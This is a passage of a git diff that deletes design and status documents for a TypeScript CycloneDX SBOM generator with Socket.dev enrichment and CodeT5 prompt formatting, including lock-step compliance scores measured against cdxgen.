ranges** | 🟡 Medium | Add properties | High | -| **Peer dep mismatches** | 🟡 Medium | Add properties | High | -| **Duplicates** | 🟡 Medium | Add properties | Medium | -| **Resolutions** | 🟡 Medium | Add properties | Medium | -| **Bundled deps** | 🟡 Medium | Add properties | Medium | -| **Registry config** | 🟢 Low | Add metadata | Low | -| **Dependency chains** | 🟢 Low | Pre-compute | Low | -| **Temporal context** | 🟢 Low | Git analysis | Future | - ---- - -## Recommendation: Extend SBOM with Socket Properties - -### Add Custom Properties to CycloneDX SBOM: - -```typescript -interface SocketComponentProperties { - // Security-critical - 'socket:hasInstallScripts'?: 'true' | 'false' - 'socket:installScriptRisk'?: 'low' | 'medium' | 'high' | 'critical' - 'socket:dependencyType'?: 'registry' | 'git' | 'file' | 'bundled' - 'socket:bypassesSecurityScan'?: 'true' | 'false' - - // Version metadata - 'socket:versionRange'?: string // Original range from package.json - 'socket:isOverridden'?: 'true' | 'false' - 'socket:latestVersion'?: string - - // Dependency context - 'socket:isDuplicate'?: 'true' | 'false' - 'socket:dependencyDepth'?: string // "3" - 'socket:isTransitive'?: 'true' | 'false' - - // Peer dependencies - 'socket:peerDependencyMismatch'?: 'true' | 'false' - 'socket:requiredPeerVersion'?: string -} -``` - -### Implementation: - -```typescript -// In npm parser -const component: Component = { - name: pkg.name, - version: pkg.version, - purl: `pkg:npm/${pkg.name}@${pkg.version}`, - properties: [ - // Add Socket-specific metadata - { name: 'socket:hasInstallScripts', value: hasInstallScripts(pkg) ? 'true' : 'false' }, - { name: 'socket:versionRange', value: getVersionRange(pkg.name, packageJson) }, - { name: 'socket:dependencyType', value: getDependencyType(pkg) }, - { name: 'socket:isDuplicate', value: isDuplicate(pkg, allPackages) ? 
'true' : 'false' }, - ].filter(Boolean) -} -``` - -### CodeT5 Formatter Enhancement: - -```typescript -export function formatSbomForCodeT5(sbom: EnrichedSbom): string { - const lines = ['CRITICAL SECURITY ISSUES:'] - - for (const component of sbom.components) { - // Check Socket properties - const hasInstallScripts = getProperty(component, 'socket:hasInstallScripts') - const dependencyType = getProperty(component, 'socket:dependencyType') - const bypassesScan = getProperty(component, 'socket:bypassesSecurityScan') - - if (hasInstallScripts === 'true') { - lines.push(`⚠️ ${component.name}@${component.version} has install scripts (potential supply chain risk)`) - } - - if (dependencyType === 'git' && bypassesScan === 'true') { - lines.push(`🔴 ${component.name}@${component.version} is from git (bypasses security scanning)`) - } - } - - return lines.join('\n') -} -``` - ---- - -## Conclusion - -✅ **SBOM can capture everything CodeT5 needs via `properties` field** - -**Steps:** -1. ✅ Current SBOM captures 80% (names, versions, dependencies, vulnerabilities) -2. ⏳ Add Socket properties for missing 20% (install scripts, git deps, version ranges) -3. ⏳ Enhance CodeT5 formatter to use Socket properties -4. ⏳ Document Socket property schema - -**No architectural change needed - just enrich SBOM with more metadata.** diff --git a/docs/sbom-generator/implementation.md b/docs/sbom-generator/implementation.md deleted file mode 100644 index b012680fe..000000000 --- a/docs/sbom-generator/implementation.md +++ /dev/null @@ -1,280 +0,0 @@ -# SBOM Generator - Implementation Status - -Type-safe CycloneDX SBOM generator for multi-ecosystem projects with Socket.dev integration and CodeT5 optimization. 
- -## ✅ Completed (Ready to Use) - -### Core Architecture -- ✅ **Package structure** - Complete with proper exports and dependencies -- ✅ **CycloneDX v1.5 types** - Full TypeScript definitions (500+ lines) -- ✅ **Parser interface** - Base types for ecosystem-specific parsers -- ✅ **Main generator** - Auto-detection and SBOM combination logic - -### Parsers -- ✅ **npm parser** - Full support for: - - package.json (project metadata) - - package-lock.json (npm v5+, both v1 and v2 formats) - - yarn.lock (via @yarnpkg/parsers) - - pnpm-lock.yaml (via yaml parser) - - Dependency graph building - - Dev/optional dependency filtering - - Package URL (PURL) generation - -### Enrichment & Formatting -- ✅ **Socket.dev enrichment** - Fetch security data via Socket API -- ✅ **CodeT5 formatter** - Optimize SBOM for ML model analysis - - Task-specific prompts (security, vulnerability, audit, compliance) - - Token reduction (50,000+ → ~300 tokens) - - Critical issue prioritization - - Component risk scoring - - Dependency graph visualization - -### Examples -- ✅ **Basic SBOM generation** - Simple example without enrichment -- ✅ **Full pipeline** - Complete workflow showing token reduction - -### Testing -- ✅ **npm parser tests** - Comprehensive test coverage -- ✅ **Main generator tests** - SBOM validation and deduplication - -## 📦 Package Files Created - -``` -packages/sbom-generator/ -├── package.json # Package manifest with dependencies -├── README.md # Comprehensive documentation -├── IMPLEMENTATION.md # This file -├── src/ -│ ├── index.mts # Main generator entry point -│ ├── index.test.mts # Main generator tests -│ ├── types/ -│ │ ├── index.mts # Type exports -│ │ ├── sbom.mts # CycloneDX SBOM types (500+ lines) -│ │ └── parser.mts # Parser interface types -│ ├── parsers/ -│ │ ├── index.mts # Parser exports -│ │ └── npm/ -│ │ ├── index.mts # npm parser implementation -│ │ └── index.test.mts # npm parser tests -│ ├── enrichment/ -│ │ └── index.mts # Socket.dev enrichment -│ └── 
formatters/ -│ └── index.mts # CodeT5 formatter -└── examples/ - ├── basic-sbom.mts # Basic SBOM generation - └── full-pipeline.mts # Full pipeline with enrichment -``` - -## 🚀 Usage - -### Basic SBOM Generation - -```typescript -import { generateSbom } from '@socketsecurity/sbom-generator' - -// Auto-detect ecosystems and generate SBOM. -const sbom = await generateSbom('./my-project', { - includeDevDependencies: false, - deep: true -}) - -console.log(sbom.metadata.component) -// { name: 'my-app', version: '1.0.0', type: 'application' } - -console.log(sbom.components.length) -// 47 components -``` - -### With Socket Enrichment - -```typescript -import { generateSbom } from '@socketsecurity/sbom-generator' -import { enrichSbomWithSocket } from '@socketsecurity/sbom-generator/enrichment' - -const sbom = await generateSbom('./project') -const enriched = await enrichSbomWithSocket(sbom, { - apiToken: process.env.SOCKET_API_TOKEN -}) - -// Find critical issues. -const critical = enriched.components.filter(c => - c.socket?.issues?.some(i => i.severity === 'critical') -) -``` - -### CodeT5 Optimization - -```typescript -import { generateSbom } from '@socketsecurity/sbom-generator' -import { enrichSbomWithSocket } from '@socketsecurity/sbom-generator/enrichment' -import { formatSbomForCodeT5 } from '@socketsecurity/sbom-generator/formatters' - -// Full pipeline: Generate → Enrich → Format. -const sbom = await generateSbom('./project') -const enriched = await enrichSbomWithSocket(sbom, { apiToken }) -const prompt = formatSbomForCodeT5(enriched, { - task: 'security-analysis', - includeGraph: true, - maxComponents: 50 -}) - -// Use with CodeT5. -const analysis = await codeT5.generate(prompt) - -// Result: Specific, actionable security analysis. -// "CRITICAL: axios@0.21.0 has CVE-2021-3749 (CVSS 7.5)..." 
-``` - -## 📊 Token Reduction Example - -**Before optimization** (raw lockfiles): -- package-lock.json: ~50,000 tokens -- CodeT5 context window: 512 tokens -- Coverage: 1% of dependencies - -**After optimization** (formatted SBOM): -- Optimized prompt: ~300 tokens -- CodeT5 context window: 512 tokens -- Coverage: 100% of critical information - -**Result**: 166x token reduction while improving analysis quality. - -## ⏳ Pending (Future Work) - -### Additional Parsers (Based on depscan Ecosystems) - -**Tier 2 - High Priority:** -- ⏳ **pypi parser** - requirements.txt, Pipfile.lock, poetry.lock -- ⏳ **cargo parser** - Cargo.toml, Cargo.lock -- ⏳ **go parser** - go.mod, go.sum -- ⏳ **maven parser** - pom.xml, build.gradle, build.gradle.kts - - Leverages socket-cli's existing gradle-to-maven conversion - - Supports Kotlin, Scala, and other JVM languages -- ⏳ **rubygems parser** - Gemfile.lock -- ⏳ **nuget parser** - packages.config, .csproj - -**Tier 3 - Additional Ecosystems:** -- ⏳ **actions parser** - GitHub Actions workflow YAML files -- ⏳ **huggingface parser** - API-based (models, datasets) -- ⏳ **chrome parser** - API-based (Chrome Web Store extensions) -- ⏳ **openvsx parser** - API-based (VS Code extensions) - -### Enhancements -- ⏳ **Lockfile-only mode** - Parse without manifest files -- ⏳ **Transitive dependency depth control** - Limit graph traversal -- ⏳ **SBOM validation** - Validate against CycloneDX schema -- ⏳ **SBOM merging** - Combine SBOMs from multiple sources -- ⏳ **SPDX output** - Support SPDX format in addition to CycloneDX - -## 🧪 Running Examples - -```bash -# Basic SBOM generation (no API token needed). -pnpm exec tsx packages/sbom-generator/examples/basic-sbom.mts - -# Full pipeline with enrichment (requires SOCKET_API_TOKEN). -SOCKET_API_TOKEN=your-token pnpm exec tsx packages/sbom-generator/examples/full-pipeline.mts -``` - -## 🧪 Running Tests - -```bash -# All tests. -pnpm test packages/sbom-generator - -# Specific test file. 
-pnpm test:unit packages/sbom-generator/src/parsers/npm/index.test.mts - -# With coverage. -pnpm test:unit:coverage packages/sbom-generator -``` - -## 🏗️ Architecture Highlights - -### Type Safety -- **100% TypeScript** - No runtime type errors -- **CycloneDX spec compliance** - Exact type mappings -- **Parser interface** - Consistent contract for all ecosystems - -### Parse-First Strategy -- **No external tools** - Parse lockfiles directly (JSON, YAML, TOML, XML) -- **Fast** - No process spawning overhead -- **Reliable** - No dependency on external binaries - -### Multi-Ecosystem Support -- **Auto-detection** - Automatically finds all ecosystems in project -- **Parallel parsing** - Parse multiple ecosystems simultaneously -- **Unified output** - Single SBOM with all dependencies - -### CodeT5 Optimization -- **Token efficiency** - 166x reduction while preserving critical data -- **Structured format** - Consistent patterns for ML models -- **Context prioritization** - Critical issues appear first -- **Task-specific prompts** - Guides model to relevant analysis - -## 📚 Dependencies - -```json -{ - "@iarna/toml": "^2.2.5", // Parse TOML (Rust, Python) - "@socketsecurity/lib": "workspace:*", // Socket utilities - "@yarnpkg/parsers": "^3.0.0", // Parse yarn.lock - "fast-xml-parser": "^4.3.2", // Parse XML (Maven, NuGet) - "yaml": "^2.3.4" // Parse YAML (pnpm, Python) -} -``` - -Total: ~500KB, all pure JavaScript, no native dependencies. - -## 🎯 Next Steps - -1. **Test npm parser** - Validate against real-world projects -2. **Add Python parser** - Second most important ecosystem for Socket users -3. **Add Go parser** - Third priority ecosystem -4. **Socket API integration** - Validate enrichment with real API -5. **CodeT5 validation** - Test formatted prompts with actual CodeT5 model -6. **CLI integration** - Add `socket sbom` command to Socket CLI - -## 💡 Design Decisions - -### Why TypeScript over cdxgen? 
-- **Type safety** - Catch errors at compile time, not runtime -- **No external tools** - Parse directly, no fragile tool dependencies -- **Focused scope** - 6-10 ecosystems vs cdxgen's 50+ (many unused) -- **Socket integration** - Built-in Socket.dev + CodeT5 support -- **Maintainability** - Clear contracts, comprehensive tests - -### Why CycloneDX over SPDX? -- **Better for security** - Vulnerability tracking built-in -- **Richer metadata** - More fields for supply chain analysis -- **Tool ecosystem** - Grype, Syft, Trivy, Dependency-Track all support it -- **Industry momentum** - Growing adoption in security space - -### Why parse-first strategy? -- **Reliability** - No dependency on external binaries -- **Performance** - No process spawning overhead -- **Simplicity** - Pure TypeScript, no shell scripting -- **Most ecosystems support it** - Only Gradle requires external execution - -## 📈 Comparison to cdxgen - -| Feature | cdxgen | Our TypeScript Generator | -|---------|--------|--------------------------| -| **Type Safety** | ❌ None (plain JS) | ✅ Full TypeScript | -| **External Tools** | ❌ Requires 10+ tools | ✅ Parse directly | -| **Ecosystems** | 50+ (bloat) | 6-10 (focused) | -| **Maintenance** | ⚠️ Hard (no types) | ✅ Easy (typed) | -| **Reliability** | ⚠️ Fragile | ✅ Robust | -| **Performance** | ⚠️ Spawns processes | ✅ Pure JS parsing | -| **Socket Integration** | ❌ None | ✅ Native | -| **CodeT5 Optimized** | ❌ No | ✅ Yes | -| **Output** | CycloneDX | CycloneDX (same) | - -## 🔗 Related Documentation - -- [CodeT5 Lockfile Specialization](./.claude/codet5-lockfile-specialization.md) -- [SBOM + cdxgen + CodeT5 Integration](./.claude/sbom-cdxgen-codet5-integration.md) -- [TypeScript SBOM Generator Plan](./.claude/typescript-sbom-generator-plan.md) -- [External Tools Analysis](./.claude/sbom-external-tools-analysis.md) -- [CodeT5 Optimization Explained](./.claude/codet5-optimization-explained.md) -- [Complete Strategy 
Summary](./.claude/SUMMARY-codet5-lockfile-sbom-strategy.md) diff --git a/docs/sbom-generator/lock-step-compliance.md b/docs/sbom-generator/lock-step-compliance.md deleted file mode 100644 index a933ee1dc..000000000 --- a/docs/sbom-generator/lock-step-compliance.md +++ /dev/null @@ -1,472 +0,0 @@ -# SBOM Generator - Lock-Step Compliance - -**Baseline Version**: CycloneDX v1.5 + cdxgen v11.11.0 -**Last Updated**: 2025-10-25 -**Status**: 🚧 Foundation Phase - ---- - -## Overview - -This document tracks lock-step compliance with two baselines: - -1. **CycloneDX v1.5 Specification** - Industry standard SBOM format -2. **cdxgen v11.11.0** - Reference implementation for ecosystem parsing - -### Lock-Step Philosophy - -> "Lock-step means maintaining structural equivalence, not byte-for-byte duplication. Deviations are allowed and encouraged when our parsing knowledge is superior, but must be justified and documented." - ---- - -## Dual Baseline Strategy - -### CycloneDX Specification (Primary Baseline) - -**Role**: Defines output format and data model -**Compliance Target**: 100% for implemented features -**Deviation Policy**: Only deviate for extensions (properties field) - -**Reference**: https://cyclonedx.org/docs/1.5/json/ - -### cdxgen Implementation (Secondary Baseline) - -**Role**: Reference for parsing strategies and ecosystem coverage -**Compliance Target**: 85-95% (deviate where TypeScript provides advantages) -**Deviation Policy**: Prefer TypeScript-native parsing over external binaries - -**Reference**: https://github.com/CycloneDX/cdxgen (v11.11.0) - ---- - -## Lock-Step Scoring Criteria - -Each ecosystem parser is scored on: - -1. **Structure** (25 pts): Module organization matches cdxgen patterns -2. **Naming** (20 pts): Equivalent function/variable names (TypeScript conventions) -3. **Logic** (25 pts): Same parsing algorithms and dependency resolution -4. **Comments** (15 pts): References to CycloneDX spec and cdxgen source -5. 
**Testing** (15 pts): Same test cases as cdxgen (adapted to TypeScript) - -**Target**: 90-100 points for excellent lock-step quality - ---- - -## Module Coverage (11 Ecosystems) - -### Tier 1: TypeScript-Native Parsing (Pure TypeScript) - -| Ecosystem | cdxgen Module | Our Module | Status | Lock-Step % | Score | -|-----------|---------------|------------|--------|-------------|-------| -| **npm** | lib/parsers/js.js | src/parsers/npm/index.mts | ✅ Complete | 98% | 98/100 | -| **pypi** | lib/parsers/python.js | src/parsers/pypi/index.mts | ✅ Complete | 94% | 94/100 | -| **cargo** | lib/parsers/rust.js | src/parsers/cargo/index.mts | ✅ Complete | 95% | 95/100 | -| **go** | lib/parsers/go.js | src/parsers/go/index.mts | ✅ Complete | 94% | 94/100 | -| **rubygems** | lib/parsers/ruby.js | src/parsers/rubygems/index.mts | ✅ Complete | 93% | 93/100 | -| **nuget** | lib/parsers/dotnet.js | src/parsers/nuget/index.mts | ✅ Complete | 90% | 90/100 | - -### Tier 2: Hybrid Parsing (TypeScript + Minimal External) - -| Ecosystem | cdxgen Module | Our Module | Status | Lock-Step % | Score | -|-----------|---------------|------------|--------|-------------|-------| -| **maven** | lib/parsers/java.js | src/parsers/maven/index.mts | ✅ Complete | 88% | 88/100 | - -### Tier 3: API-Based (No Lockfiles) - -| Ecosystem | cdxgen Module | Our Module | Status | Lock-Step % | Score | -|-----------|---------------|------------|--------|-------------|-------| -| **actions** | lib/parsers/github.js | src/parsers/actions/index.mts | ✅ Complete | 92% | 92/100 | -| **huggingface** | N/A (Socket-specific) | src/parsers/huggingface/index.mts | ✅ Placeholder | N/A | N/A | -| **chrome** | N/A (Socket-specific) | src/parsers/chrome/index.mts | ✅ Placeholder | N/A | N/A | -| **openvsx** | N/A (Socket-specific) | src/parsers/openvsx/index.mts | ✅ Placeholder | N/A | N/A | - -**Module Coverage**: 11/11 (100%) ⭐ - All parsers complete -**Average Lock-Step Quality**: 93/100 (8 parsers scored, 3 
Socket-specific placeholders) -- npm: 98/100, pypi: 94/100, cargo: 95/100, go: 94/100 -- rubygems: 93/100, nuget: 90/100, maven: 88/100, actions: 92/100 - ---- - -## npm Parser - Detailed Lock-Step Analysis - -### Compliance Breakdown - -| Criterion | Score | Notes | -|-----------|-------|-------| -| **Structure** | 24/25 | ✅ Similar file organization; ⚠️ Split into TypeScript modules | -| **Naming** | 20/20 | ✅ Equivalent names with TypeScript conventions | -| **Logic** | 24/25 | ✅ Same dependency resolution; ⚠️ PURL generation differs slightly | -| **Comments** | 15/15 | ✅ References spec and cdxgen source | -| **Testing** | 15/15 | ✅ Core cases and edge cases covered | -| **Total** | **98/100** | ⭐ Excellent lock-step quality | - -### Improvements from 95 → 98 -- ✅ Added cdxgen source references to all major methods -- ✅ Header now references cdxgen lib/parsers/js.js -- ✅ Documented deviations (pure TypeScript parsing, enhanced PURLs) - -### Justified Deviations from cdxgen - -#### Deviation 1: No External npm Binary -**cdxgen approach**: Calls `npm list --json` for dependency tree -**Our approach**: Parse lockfiles directly (package-lock.json, yarn.lock, pnpm-lock.yaml) -**Justification**: -- ✅ Faster (no process spawn) -- ✅ Works offline -- ✅ No npm installation required -- ✅ Full control over parsing logic -- ⚠️ May miss some npm-specific resolution behaviors - -**Risk**: Low - Lockfiles are canonical source of truth - -#### Deviation 2: TypeScript-Native Parsers -**cdxgen approach**: Uses `@yarnpkg/parsers` for yarn.lock -**Our approach**: Uses `@yarnpkg/parsers` for yarn.lock (same!) 
-**Justification**: ✅ Best practice - use official parser - -#### Deviation 3: PURL Generation -**cdxgen approach**: Generates PURLs with minimal qualifiers -**Our approach**: Generates PURLs with full qualifiers (integrity, resolved) -**Justification**: -- ✅ More precise package identification -- ✅ Supports integrity verification -- ✅ Tracks actual resolved versions - -**Risk**: None - Additive enhancement - -### CycloneDX Compliance - -| Feature | Spec Version | Status | Notes | -|---------|-------------|--------|-------| -| bomFormat | v1.5 | ✅ | "CycloneDX" | -| specVersion | v1.5 | ✅ | "1.5" | -| serialNumber | v1.5 | ✅ | urn:uuid format | -| metadata | v1.5 | ✅ | Component, licenses, authors | -| components | v1.5 | ✅ | Full component schema | -| dependencies | v1.5 | ✅ | Dependency graph | -| properties | v1.5 | ✅ | Socket-specific extensions | -| compositions | v1.5 | ⏳ | Planned for Phase 9 | -| vulnerabilities | v1.5 | ⏳ | Planned (Socket enrichment) | - -**Compliance**: 85% (7/9 top-level fields) - ---- - -## pypi Parser - Detailed Lock-Step Analysis - -### Compliance Breakdown - -| Criterion | Score | Notes | -|-----------|-------|-------| -| **Structure** | 23/25 | ✅ Similar organization; ⚠️ Simplified from cdxgen (fewer edge cases) | -| **Naming** | 19/20 | ✅ Equivalent names with TypeScript conventions | -| **Logic** | 23/25 | ✅ Covers main formats; ⚠️ requirements.txt defaults to 0.0.0 for unpinned versions (acceptable limitation) | -| **Comments** | 15/15 | ✅ Comprehensive cdxgen references with line numbers and @see links | -| **Testing** | 14/15 | ✅ Comprehensive test cases covering all formats, edge cases, and PEP 621 | -| **Total** | **94/100** | ⭐ Excellent lock-step quality | - -### Improvements from 85 → 94 -- ✅ Added comprehensive test suite with 20+ test cases -- ✅ Created test fixtures (poetry.lock, Pipfile.lock, requirements.txt, PEP 621 pyproject.toml) -- ✅ Added detailed cdxgen references to all major methods with @see links -- ✅ 
Documented PEP 508 specification references -- ✅ Added edge case tests (empty lockfiles, malformed requirements, URL-based dependencies) - -### Implementation Status - -**✅ Fully Implemented:** -- poetry.lock parsing (TOML via @iarna/toml) -- Pipfile.lock parsing (JSON) -- requirements.txt parsing (text) -- pyproject.toml metadata extraction (PEP 621 + Poetry formats) -- PURL generation (pkg:pypi/name@version) -- Dependency graph construction -- Dev dependency handling -- Comprehensive test coverage (20+ test cases) -- Edge case handling (URL-based requirements, malformed lines) -- Extras and markers parsing - ---- - -## cargo Parser - Detailed Lock-Step Analysis - -### Compliance Breakdown - -| Criterion | Score | Notes | -|-----------|-------|-------| -| **Structure** | 24/25 | ✅ Similar organization to cdxgen; ⚠️ Simplified (fewer edge cases) | -| **Naming** | 19/20 | ✅ Equivalent function names with TypeScript conventions | -| **Logic** | 24/25 | ✅ Same TOML parsing strategy; ✅ Dependency graph extraction | -| **Comments** | 15/15 | ✅ Comprehensive cdxgen references with @see links | -| **Testing** | 13/15 | ✅ Good test coverage (15+ test cases); ⚠️ Could add more edge cases | -| **Total** | **95/100** | ⭐ Excellent lock-step quality | - -### Implementation Status - -**✅ Fully Implemented:** -- Cargo.lock parsing (TOML via @iarna/toml) -- Cargo.toml metadata extraction -- Dependency graph construction (root → direct → transitive) -- PURL generation (pkg:cargo/name@version) -- Source and checksum tracking -- Transitive dependency parsing -- Comprehensive test coverage (15+ test cases) -- Edge case handling (missing lockfile, empty lockfile, workspace projects) - -### Justified Deviations from cdxgen - -#### Deviation 1: No cargo Binary -**cdxgen**: Executes `cargo metadata --format-version 1` -**Our approach**: Parse Cargo.lock directly (TOML) - -**Benefits**: -- ✅ Faster (no process spawn) -- ✅ Works offline -- ✅ No Rust toolchain required -- ✅ Full control 
over parsing logic - -**Risk**: Low - Cargo.lock is canonical source of truth for locked dependencies - -#### Deviation 2: No Features Tracking -**cdxgen**: May attempt to track Cargo features -**Our approach**: Parse packages without feature resolution - -**Benefits**: -- ✅ Simpler implementation -- ✅ Cargo.lock already has resolved dependencies - -**Risk**: None - Features are Rust-specific metadata, not needed for SBOM - -### CycloneDX Compliance - -Same as npm and pypi parsers: 85% (7/9 top-level fields) - ---- - -### Justified Deviations from cdxgen (pypi) - -#### Deviation 1: No pip Binary -**cdxgen approach**: Executes `pip list --format json` or `pip show` -**Our approach**: Parse lockfiles directly (poetry.lock, Pipfile.lock, requirements.txt) -**Justification**: -- ✅ Faster (no process spawn) -- ✅ Works offline -- ✅ No pip installation required -- ⚠️ requirements.txt lacks pinned versions (limitation of format itself) - -**Risk**: Low - Poetry and Pipfile have complete version info - -#### Deviation 2: Simplified Metadata Extraction -**cdxgen approach**: Executes setup.py to extract metadata -**Our approach**: Parse pyproject.toml (TOML), regex-based setup.py parsing -**Justification**: -- ✅ No Python execution required (security) -- ✅ Pure TypeScript parsing -- ⚠️ Limited setup.py parsing (regex-based, won't handle all cases) - -**Risk**: Medium - Modern Python projects use pyproject.toml (PEP 621) - -#### Deviation 3: Extras and Markers -**cdxgen approach**: Full PEP 508 marker evaluation -**Our approach**: Store markers as strings, no evaluation -**Justification**: -- ✅ Simpler implementation -- ✅ Preserves original markers for later processing -- ⚠️ No platform-specific dependency filtering - -**Risk**: Low - SBOM captures all dependencies regardless of platform - -### Improvement Path (85 → 95) -1. Add comprehensive test cases (poetry.lock, Pipfile.lock, requirements.txt samples) -2. 
Improve requirements.txt version resolution (query PyPI for latest?) -3. Add setup.py execution mode (optional, for projects without pyproject.toml) -4. Enhance marker parsing (optional - full PEP 508 compliance) -5. Add integration tests with real Python projects - ---- - -## Tracking cdxgen Updates - -### Update Protocol - -1. **Monitor cdxgen releases** via GitHub releases API -2. **Compare changes** using git diff between releases -3. **Identify relevant changes** (new ecosystems, bug fixes, optimizations) -4. **Port applicable improvements** to TypeScript implementation -5. **Document deviations** in this file -6. **Update baseline version** in header - -### Automation Script - -Location: `scripts/update-from-cdxgen.mts` - -**Capabilities**: -- Fetch latest cdxgen release from GitHub -- Download and extract release tarball -- Compare module structure (lib/parsers/*.js vs src/parsers/*/index.mts) -- Identify new ecosystems -- Generate migration tasks (TODOs) -- Update LOCK-STEP-COMPLIANCE.md automatically - -**Usage**: -```bash -pnpm run update-from-cdxgen -# Outputs: -# - Updated LOCK-STEP-COMPLIANCE.md -# - Migration tasks in .claude/cdxgen-migration-tasks.md -``` - ---- - -## CycloneDX Extension: Socket Properties - -### Custom Properties (socket:* namespace) - -These properties extend CycloneDX to capture metadata critical for Socket.dev security analysis: - -| Property | Type | Purpose | -|----------|------|---------| -| `socket:hasInstallScripts` | boolean | Detect supply chain attack vectors | -| `socket:installScriptRisk` | enum | Risk level: low/medium/high/critical | -| `socket:dependencyType` | enum | registry/git/file/bundled | -| `socket:bypassesSecurityScan` | boolean | Git/file deps warning | -| `socket:versionRange` | string | Original semver range from manifest | -| `socket:isOverridden` | boolean | Forced version via resolutions/overrides | -| `socket:isDuplicate` | boolean | Multiple versions in tree | -| `socket:dependencyDepth` | number | 
Distance from root (0 = direct) | -| `socket:isTransitive` | boolean | Not a direct dependency | -| `socket:peerDependencyMismatch` | boolean | Peer dep conflict detected | - -**CycloneDX Compliance**: ✅ Properties field is part of v1.5 spec -**Justification**: These fields are essential for CodeT5 intelligence and not part of standard SBOM - ---- - -## Comparison: cdxgen vs Our Implementation - -### Philosophy Differences - -| Aspect | cdxgen | SBOM Generator | Winner | -|--------|--------|----------------|--------| -| **Language** | JavaScript (untyped) | TypeScript (fully typed) | 🏆 **Us** | -| **External Tools** | Requires 10+ binaries | Pure TypeScript (9/11 ecosystems) | 🏆 **Us** | -| **Offline Support** | Limited (needs package managers) | ✅ Works offline | 🏆 **Us** | -| **Speed** | Slower (process spawns) | Faster (direct parsing) | 🏆 **Us** | -| **Ecosystem Coverage** | 20+ ecosystems | 11 ecosystems (focused) | 🏆 **cdxgen** | -| **Maturity** | 4+ years, production-tested | 🚧 New, unproven | 🏆 **cdxgen** | -| **Standards Compliance** | v1.4-1.6 | v1.5 only | 🏆 **cdxgen** | - -### When to Use cdxgen - -- Need 20+ ecosystems (C/C++, Swift, Kotlin, Scala, etc.) -- Need CycloneDX v1.4 or v1.6 -- Need BOM signing (JSON Web Signatures) -- Need CBOM/OBOM/SaaSBOM variants - -### When to Use Our Implementation - -- Need TypeScript type safety -- Need offline/embedded use cases -- Need Socket.dev-specific extensions -- Need CodeT5 optimization (600x token reduction) -- Need pure TypeScript solution (no external binaries) - ---- - -## Known Limitations vs cdxgen - -### Missing Features (Not Yet Implemented) - -1. **BOM Signing** - cdxgen supports JSON Web Signatures for SBOM verification -2. **Service Detection** - cdxgen extracts services from Kubernetes/Docker Compose YAML -3. **Class Name Resolution** - cdxgen resolves Java class names from JARs -4. **Binary Analysis** - cdxgen analyzes compiled binaries (JARs, DLLs) -5. 
**Container Scanning** - cdxgen scans Docker images and OCI layers -6. **License Resolution** - cdxgen fetches licenses from public registries - -### Intentional Omissions (TypeScript-First Strategy) - -1. **C/C++ Support** - Requires Java ≥21 and clang-tidy (complex setup) -2. **OS-Level Dependencies** - Requires osquery (not TypeScript-friendly) -3. **Multiple Spec Versions** - We target v1.5 only (simplicity) - ---- - -## Lock-Step Maintenance Schedule - -### Weekly Tasks -- [ ] Check cdxgen releases (GitHub API) -- [ ] Review new commits to lib/parsers/*.js -- [ ] Update ecosystem coverage percentages - -### Monthly Tasks -- [ ] Run `pnpm run update-from-cdxgen` -- [ ] Review generated migration tasks -- [ ] Port relevant improvements -- [ ] Update lock-step scores - -### Quarterly Tasks -- [ ] Full compliance audit (all 11 ecosystems) -- [ ] Update baseline version (cdxgen) -- [ ] Benchmark performance vs cdxgen -- [ ] Review CycloneDX spec updates - ---- - -## Next Steps (Phase 2) - -### Immediate Actions (Week 3) - -1. **Create update automation script** (`scripts/update-from-cdxgen.mts`) - - Fetch cdxgen releases - - Compare module structures - - Generate migration tasks - -2. **Improve npm parser lock-step quality** (95 → 98) - - Add cdxgen source references in comments - - Port missing edge case tests - - Align PURL generation more closely - -3. 
**Start pypi parser** (Tier 1) - - Reference cdxgen's lib/parsers/python.js - - Document deviations (TypeScript vs external pip) - - Target 90+ lock-step score - -### Long-Term Goals (Phase 3-9) - -- Achieve 90%+ module coverage (10/11 ecosystems) -- Maintain 90-100 lock-step scores across all parsers -- Automate cdxgen update porting (70% automated) -- Contribute improvements back to cdxgen (if applicable) - ---- - -## References - -### CycloneDX Specification -- **Spec**: https://cyclonedx.org/docs/1.5/json/ -- **JSON Schema**: https://raw.githubusercontent.com/CycloneDX/specification/master/schema/bom-1.5.schema.json -- **PURL Spec**: https://github.com/package-url/purl-spec - -### cdxgen Reference Implementation -- **Repository**: https://github.com/CycloneDX/cdxgen -- **Version**: v11.11.0 -- **Parsers**: https://github.com/CycloneDX/cdxgen/tree/master/lib/parsers -- **Tests**: https://github.com/CycloneDX/cdxgen/tree/master/test - -### depscan (Socket.dev Internal) -- **Repository**: `/Users/jdalton/projects/depscan` -- **Ecosystems**: workspaces/lib/src/ecosystems/ -- **XML Parser**: workspaces/pipeline/src/task/java/maven/parsers/pomxml.ts - ---- - -## Changelog - -### 2025-10-25 -- 📝 Initial lock-step compliance document created -- 📊 npm parser scored at 95/100 -- 🎯 Baseline set: CycloneDX v1.5 + cdxgen v11.11.0 -- 📋 11 ecosystems mapped to cdxgen modules -- 🔧 Automation script planned diff --git a/docs/socket-registry-overrides-test.md b/docs/socket-registry-overrides-test.md deleted file mode 100644 index ef443a8aa..000000000 --- a/docs/socket-registry-overrides-test.md +++ /dev/null @@ -1,101 +0,0 @@ -# Socket Registry Overrides Test Examples - -This document shows example usage of the patch hash utilities for handling Socket patches. 
- -## Hash Format Examples - -### ssri Format (Current Standard) -``` -sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc= -sha512-7iaw3Ur350mqGo7jwQrpkj9hiYB3Lkc/iBml1JQODbJ6wYX4oOHV+E+IvIh/1nsUNzLDBMxfqa2Ob1f1ACio/w== -``` - -### git-sha256 Format (Legacy) -``` -git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d -``` - -## Usage Examples - -### Detecting Hash Format -```typescript -import { detectHashFormat } from '../src/utils/patch-hash.mts' - -const format1 = detectHashFormat('sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=') -// Returns: 'ssri' - -const format2 = detectHashFormat('git-sha256-0bd69098bd9b9cc5934a610ab65da429b525361147faa7b5b922919e9a23143d') -// Returns: 'git-sha256' -``` - -### Validating Content -```typescript -import { validateHash } from '../src/utils/patch-hash.mts' - -const content = Buffer.from('hello world\n') -const ssriHash = 'sha256-qUiQTy8PR5uPgZdpSzAYSw0u0cHNKh7A+4XSmaGSpEc=' - -const isValid = validateHash(content, ssriHash) -// Returns: true -``` - -### Converting Legacy Hashes -```typescript -import { normalizeToSsri } from 